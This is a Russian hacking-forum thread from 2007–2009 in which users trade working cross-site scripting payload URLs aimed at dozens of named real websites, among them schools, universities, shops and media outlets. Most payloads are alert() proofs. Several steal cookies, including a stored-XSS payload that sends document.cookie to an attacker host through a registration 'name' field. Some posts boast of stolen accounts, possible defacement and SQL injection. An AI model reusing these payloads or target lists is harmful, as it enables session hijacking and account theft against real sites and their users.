1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

XSS

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. wriwel
    wriwel «ёлки!» Продвинутый
    Симпатии:
    59
    http://schools.keldysh.ru/fm/fm.dll/%3Cscript%3Ealert('xaker.name')%3C/script%3E
     
    22 фев 2008
    1 человеку нравится это.
  2. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://www.imeem.com/tag/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&f=
    тырим куки
    Код:
    http://www.imeem.com/tag/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    25 фев 2008
    1 человеку нравится это.
  3. VecktorZona
    VecktorZona Продвинутый
    Симпатии:
    165
    http://shop.megafonvolga.ru/chelny/?pageid=5&subpageid=7&chk=1&rnd=590619266&subpageid=7&T1=><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&T2=11&T3=1977&T4=8&tek=10&tp[]=8&chk=1
     
    21 июн 2008
  4. Mo4x
    Mo4x Продвинутый
    Симпатии:
    1
    Xakep.ru гыыы Хекаем аки на форуме
    http://forum.antichat.ru/showpost.php?p=763215&postcount=1980

    Добавлено через 56 минут
    нашел минуту назад тоже xakep.ru
    Добавлено через 1 час 18 минут
    Работает только для зарегистрированных на форуме
    http://forum.xakep.ru/pmsearch.aspx?folders=">">">">">">"><script>alert('mo4x')</script><!------
     
    Последнее редактирование: 7 июл 2008
    7 июл 2008
    1 человеку нравится это.
  5. =<4APAEV>=
    =<4APAEV>= Новичок
    Симпатии:
    24
    8 июл 2008
    1 человеку нравится это.
  6. EXploit
    EXploit Продвинутый
    Симпатии:
    25
    1) XSS in Open WebMail 2.51
    2) Поиск в гугле openwebmail/openwebmail-
    И понеслась ;)
    PHP:
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
    _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XNT')%3C/script%3E
     
    11 июл 2008
    3 пользователям это понравилось.
  7. Mo4x
    Mo4x Продвинутый
    Симпатии:
    1
    13 июл 2008
  8. Ap0str0F
    Ap0str0F Продвинутый
    Симпатии:
    5
    Но раз уж не запрещено их выкладывать, и тем более тут выкладывают, то вот:

    Поле поиска:

    Код:
    www.krainamriy.com
    www.exploredc.org
    www.febs.org
    www.mostelecom.ru/index.php
    www.kino.ru
    http://www.pesochnica.ru/
    http://trickyboy.com/
    В сообщении:
    Код:
    distant.ioso.ru/forum.php
    В поле Имя Пользователя, слева в Сервис надо выбрать Почта на caravan.ru или Почта на pol.ru
    Код:
    http://www.caravan.ru/
    ..
     
    25 июл 2008
  9. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Код:
    http://info.onu.edu.ua/communication/gb/
    Это гостевуха...
    После нескольких статей которые еще давно читал об хсс, мало что понял, прочитал главу об xss в одной книге и многое усвоил, правильно составил запрос :
    Код:
    <script>img = new Image();img.src="http://censored.xz/snf/s.gif?"+document.cookie;</script>
    Первая моя xss :)

    Добавлено через 3 часа 47 минут
    Код:
    http://window.edu.ru/
    Регимся (я на проксике, на всякий, это делал) в поле "Имя" (НЕ Логин!) при регестрации вводим
    Код:
    <script>img = new Image();img.src="http://FUCKit.xz/snf/s.gif?"+document.cookie;</script>
    Подтверждаем регу с введенного ранее мыла. Ходим по форуму постим ответы с любым содержанием, все равно отображаться не будет, и наслаждаемся полноценными куками :)
     
    Последнее редактирование: 14 сен 2008
    14 сен 2008
    1 человеку нравится это.
  10. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    первая)
    Код:
    http://www.timesonline.co.uk/parentpower/search.php?t=name&name=%3Cscript%3Ealert%28%27xss+by+faza02%27%29%3C%2Fscript%3E&x=28&y=1
     
    22 сен 2008
  11. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    Код:
    http://plus-msk.ru/search.php?t=rus&s=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&w=art
    Код:
    http://club.foto.ru/lab/search.php?action=search&city_id=1&type=0&keyword=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&sort=last_comment_date
    Код:
    http://bestcrosswords.ru/search.php?mask=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&maskdef=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    Код:
    http://www.mainfo.ru/download/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    Код:
    http://vss.nlr.ru/queries/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    Код:
    http://www.skazki.org.ru/search.php?text=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    Код:
    http://www.uralweb.ru/search/?qry=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&qtype=1&x=13&y=8
    Код:
    http://www.skazki.org.ru/search.php?text=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    Код:
    http://mbschool.ru/search.php?search=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=31&y=10
     
    25 сен 2008
    1 человеку нравится это.
  12. wriwel
    wriwel «ёлки!» Продвинутый
    Симпатии:
    59
    Код:
    http://www.russianamerica.com/top/?categ=personal%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    5 окт 2008
  13. .xs
    .xs Продвинутый
    Симпатии:
    5
    Месяц назад была такая XSS... сайт ЦЕРНа

     
    Последнее редактирование модератором: 8 янв 2009
    5 окт 2008
  14. Mo4x
    Mo4x Продвинутый
    Симпатии:
    1
    Хсс меня просто убил собственно вот
    В низу страницы есть надпись "Я нашел ошибку!" Клика-ем на неё .
     
    Последнее редактирование модератором: 8 янв 2009
    5 окт 2008
  15. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Там дефейс можно провести...

    Ну и чтоб по теме

    Код:
    http://www.ykazka.ru/forum
    Сплошные XSS напрова и налево, ставляй к примеру в комменте, либо я натырил там акков, раньше еще когда баловалсо, повставлял сместо ников алерты етк...


    Там же и сплошные скули :) Я ничего полезного не извлек с 4-й базы, хз видимо заумные названия табл либо префикс. Читалко файлов там нипошло... На шелл нигде прав небыло...
     
    5 окт 2008
  16. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Разное:

    Код:
    http://grani.ru/user/index.html%0A?ErrMsg=<script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.bonbon.ru/products.php?type="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.mp3muzika.ru/store/index.php?chapt="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.coca-cola.by/xmas/winners.php?letter="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://xage.ru/tag.php?tag="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.samopal.net/index.php?type=stixi&auhtor=xxx&name="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.kokotka.net/search.php?type=phone&phone="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.kgmcrew.ru/forum/uinfo.php?un="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://studentport.su/slovo/glossary.php?letter="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.eda.ru/catalog/index.php?alpha="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.enresurs.ru/katalog.php?let="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://sextalk.ru/showmembers.php?Cat=&sb=5&page=1&like="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://catalog.299.ru/title.php?s="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.slovoborg.ru/slb.php?a=lettr&l="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.fox.by/search/index.php?query="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://planetolog.ru/phonecode-city-alphabet.php?country=KW&alphabet="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.austria.at/search.php?cmd=catalog&r="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>

    Америко:


    Код:
    http://1000personals.com/index.php?l="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://isofix.pegperego.com/p.php?l="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.accuweather.com/us-city-list.asp?zipcode="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://forums.wnd.com/index.php?message="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.slackware.com/security/list.php?l="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>&y=2004
    Код:
    http://www.employmentguide.com/searchresults.php?q="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
    Код:
    http://www.wdrv.com/musicsearch.php?q=&type=CD&albumName=&artistName="><script>alert(String.fromCharCode(120,97,107,101,114,46,110,97,109,101))</script>
     
    11 окт 2008
    3 пользователям это понравилось.
  17. NetSky
    NetSky адепт Модератор
    Симпатии:
    84
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 100 or greater.**
     
    15 ноя 2008
  18. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    пример:
    Код:
    http://www.zachetka.ru/forum/showthread.aspx?threadId=35295
    хсска в логине.
     
    19 дек 2008
  19. GettoLove
    GettoLove Продвинутый
    Симпатии:
    34
    Код:
    hxxp://rutube.ru/stat.html?rm=link&link="><script>alert('GettoLove')</script>
     
    8 янв 2009
    2 пользователям это понравилось.
  20. r0th
    r0th Продвинутый
    Симпатии:
    68
    Код:
    http://www.fasqu.com/search.php?text="><script>alert('xss')</script>
    
     
    8 янв 2009

Поделиться этой страницей

Загрузка...